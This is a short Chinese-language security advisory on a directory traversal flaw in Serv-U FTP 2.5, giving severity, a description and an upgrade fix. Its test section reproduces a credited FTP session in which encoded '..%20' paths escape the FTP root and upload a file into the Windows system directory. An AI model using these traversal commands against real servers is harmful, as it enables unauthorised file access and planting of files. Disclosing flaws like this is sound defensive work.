Serv-U FTP存在目录遍历漏洞发布时间:2000-12-11 更新时间:2000-12-11 严重程度:中 威胁程度:远程非授权文件存取 错误类型:输入验证错误 利用方式:服务器模式 受影响系统 Cat Soft Serv-U 2.5详细描述 认证用户可以访问Serv-U FTP 的安装盘中的ftproot,用户可以读,写,执行和 列表Home目录,一但用户可以访问home目录他们可以通过GET请求来传输文件。 测试代码 Exploit provided by Zoa_Chien <zoachien@securax.org>: ftp> cd \..%20. 250 Directory changed to /.. ftp> cd %20..%20%20../winnt\ 250 Directory changed to /c:/TOMB/../WINNT ftp> put autoexec.bat %20..%20%20../winnt/2.bat 200 PORT Command successful. 150 Opening ASCII mode data connection for 2.bat. 226 Transfer complete. ftp> dir \..%20.\..%20.\winnt\ 解决方案 升级到serv-U FTP 2.5i: Cat Soft upgrade Serv-U 2.5i http://ftpserv-u.deerfield.com/download/getftpservu.cfm Cat Soft Serv-U 2.4: Cat Soft upgrade Serv-U 2.5i http://ftpserv-u.deerfield.com/download/getftpservu.cfm 相关信息 |
